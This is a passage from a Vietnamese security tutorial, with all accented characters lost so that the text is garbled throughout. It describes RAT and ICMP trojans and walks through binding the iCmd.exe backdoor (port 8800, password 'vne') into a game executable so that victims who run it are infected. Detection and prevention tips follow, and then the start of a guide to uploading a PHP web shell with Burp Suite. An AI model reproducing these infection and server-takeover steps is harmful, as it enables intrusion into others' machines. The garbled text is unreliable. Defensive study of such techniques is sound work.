8800, v hon ton c th kim sot c my tnh qua giao din command

line.



d. HTTP RAT

Vi tnh nng hot ng nh mt Web Server c lp trnh sn cho php qun l

my tnh trn giao din Web. Bn hon ton c th thc hin c trn Internet,

khi mt my nhim Trojan ny s t ng gi mail v cho bn qua cu hnh.



Gi ng trn bt k my no bn cng c th vo my ny qua ca s ca mt

trnh duyt web bt k:

http://192.168.1.33

Ti c th chy xa hay download bt k file no t my nn nhn

e. ICMP Trojan

S dng tunnel l ICMP gn nh c s ng ca bt k firewall no hay cc

h thng.

- Trn my nn nhn s dng ICMP Trojan Server chng ta phi ci Trojan ny

vi cu lnh

http://192.168.1.33/



- Ngi trn bt k my no bn s dng ICMPsend remote ti h thng b

nhim ICMP trojan

Trn thc t cn rt nhiu loi Trojan khc bn c th tm hiu trn cc trang web

chuyn v security, trong bi vit ny ti ch Demo mt s loi Trojan dng

trainning m thi.



6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng

My phn bn trn l cch s dng Trojan c bn. V d bn mun s dng con

trojan l iCmd.exe bn phi lm th no? Copy file vo my v chy vi cu

lnh iCmd.exe vne 8800? iu ny khng th thc hin bi ai cho bn ngi trn

my .

Vy lm th no ly nhim Trojan ny vo my ca nn nhn?

Tht khng may nhng k tn cng khn ngoan n mt hay nhiu Trojan vo

mt file Exe bnh thng, nh mt chng trnh c, mt file exe b ci windows,

file chy ca cc phn mm min ph m c khi n lun vo b ci cc chng

trnh dit virus.

Cch n Trojan vo file .exe l cng ngh Wrapper. Cc phn mm thng

dng:

- One file EXE Maker

- Yet Another Binder

- Pretator Wrapper.

a. S dng One file EXE Maker du v chy file iCmd.exe

Download b ci ca phn mm ny ci ra my sau l chy ghp cc file

File EXE m ti la chn l mt chng trnh c Caro rt ph bin Fiver6_8.exe.

- File c caro ti chy bnh thng

- file iCmd.exe ti chy n v copy vo h thng

- Cu lnh thm trn file iCmd.exe ti chn l vne 8800 cho php telnet vo port

8800 v password l vne.



Nhn Save hon thnh qu trnh.

- Ti save ra vi tn l caro.exe

Nhn dung lng ca file ti thy:

- iCmd.exe dung lng 36KB

- Fiver6_8_en.exe dung lng 310K

- Caro.exe c to t hai file trn dung lng 353KB



Gi ti th chy file Caro.exe

Ch c ca s nh c caro c bt ra nhng c mt file iCmd.exe c hot

ng, kim tra trong Task Manager:



ng trn bt k my no ti cng c th remote ti my ny qua port 8800 v

password l vne



Trong bi vit ny ti ch Demo mt chng trnh n file Exe cc bn c th tm

kim cc phn mm ny trn Internet.

7. Cch pht hin Trojan.

C ba nguyn l ca bt k chng trnh Trojan no:

- Mt trojan mun hot ng phi lng nghe cc request trn mt cng no

- Mt chng trnh ang chy s phi c TN trong Process List

- Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng.

a. Pht hin Port s dng bi Trojans

- Dng cu lnh Netstat an trong windows bit ht thng ang lng nghe trn

cc port no

+ Hnh di ta thy c port 7777 th ra l port ca Tini Trojan

+ My ca ti u c s port no l 8800 sao li ang ch nghe v c my

ang kt ni n nh chc l ca Trojans



- Dng phn mm Fport

- Dng phn mm TCPView

Tht may ti c th xem ton b cc port ang s dng v chng trnh g ti ang

s dng port no

T y ti c th kim tra cc dch v mng ca ti vi nhng Port nghi ng ti c

th dng Firewall ng li.



b. Cch pht hin cc chng trnh ang chy

- Dng phn mm Process Viewer tt c cc Process s c hin th d c ang

chy ch n v khng hin trn Task Manager ca Windows.



c. Tm mt chng trnh chy lc khi ng

- Trong Satup

- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig trong

Table Starup chng trnh no mun chy t ng s phi nm ti y.



Trong v d ny ti thy c file nc.exe chy lc khi ng v tr ca n l ti folder

c:\vnexperts.net

8. Cch phng chng Trojans v Backdoor

- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh

Trojans)

- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScript trn

cc trang web bi c th s nh km Trojans

- Ti quan trng l phi update OS thng xuyn

- Ci phn mm dit virus uy tn: Ti hay dng: Kaspersky Internet Security,

Norton Internet Security, v Mcafee Total Security, nhng nghe ni cn rt nhiu

phn mm dit Virus v chng Trojan hay khc. Sau khi ci cc phn mm ny bn

hy update n thng xuyn.



9. Kt lun.

Trong bi vit ny ti trnh by cc khi nim c bn th no l Trojans

Backdoor, cch chng ly nhim vo h thng. Mt vi trojans demo cho cc bn

hiu s nguy him ca Trojan. Quan trng nht l cc bn hy bo v chnh mi

trng ca mnh trc cc tn cng t bn ngoi.

Theo Tocbatdat ca Vnexperts Research Department



Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng

Website thng mi hay cc forum t pht trin t PHP cho php upload hnh

nh rt d b hacker tn cng qua cch upload nhng Shell ln v chim quyn

iu khin. Trong bi vit ny ti s hng dn cc bn k thut upload mt file

PHP chim quyn iu khin my ch v cch phng chng li ny i vi cc

qun tr website.

L hng ny khi kim tra vi cc Tools scan uy tn nh: Acunetix, IBM App Scan..

ch mc Low c ngha l mc nguy him thp nhng li c th chim quyn

iu khin web server. Vi mc ch quan trng nht ca bi vit l cho ngi

qun tr web hiu c cc nguy c tim n, cc cch khai thc v phng v ra sao.

Bi vit c chia ra cc mc

1. Tools cn thit

2. K thut upload file PHP v chim quyn iu khin my ch web

3. K thut bo mt cho my ch web fix l hng bo mt ny



I. Cc tools cn thit

- Burpsuite_v1.3

- Java framework

- firefox

- website b li

- r57vn.php

1. Burpsuite_v1.3

y l mt Tool vit trn nn Java nn mun chy c tools ny phi ci

Java trc. Tools ny lm vic nh mt web proxy nhng n l mt

intercepting proxy.

Intercepting proxy: l mt proxy cho php iu chnh ni dung ca gi tin

ngi dng truyn nn web server. Do khi ta s dng tools ny cho php

thay i ni dung yu cu t trnh duyt web gi ln web server.

Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip

1. Java

y l b ci Java cho php cc chng trnh java chy trn my tnh

Link download: http://sun.com

2. firefox

S dng firefox bi mt s k thut khng s dng IE c

3. Website b li

Khng khuyn co mi ngi i hack cc trang web khc. Hacker m trng

ch hack cc trang web c s cho php ca ngi ch qun website. Bi

http://www.portswigger.net/suite/burpsuite_v1.3.ziphttp://sun.com/



vit ny ti s hack trc tip vo trang web ca ti l trang

http://tocbatdat.com Trang web pht trin trn nn php v dnh l hng.

4. r57vn.php

L mt Shell cho php lm nhiu tc v trn webserver mt cch n gin

II. K thut upload file PHP v chim quyn iu khin my ch web

1. Chun b

Bc 1: ci t Java

Bc 2: Download burpsuite_v1.3 v gii nn ra s thy file .jar th dng li

Bc 3: Ci t firefox

Bc 4: Chun b trnh duyt IE (s dng IE upload file) bi cu hnh

proxy trn IE n gin hn

Bc 5: Kt ni Internet v truy cp trang web http://tocbatdat.com (trong

trng hp website ny ti fix l hng cc bn c th kim web khc

dnh l hng ny demo).

2. Thc hin Upload file php ln website

a. Kin thc chung

Hu ht cc trang web hin nay u ch cho upload mt s dng file nht

nh nh: jpg, gif, v khng cho php upload cc nh dng file khc vy

chng ta lm th no upload mt file PHP ln website ny.

Trc ht chng ta phi hiu c website lm th no pht hin ra file

ny khng phi l cc nh dng cho php c hai cch website kim tra:

+ Kim tra nh dng file (dng ny rt thng dng)

+ Kim tra ui file (dng ny th khng nhiu)

http:

Technology

Tan cong va_bao_ve_he_thong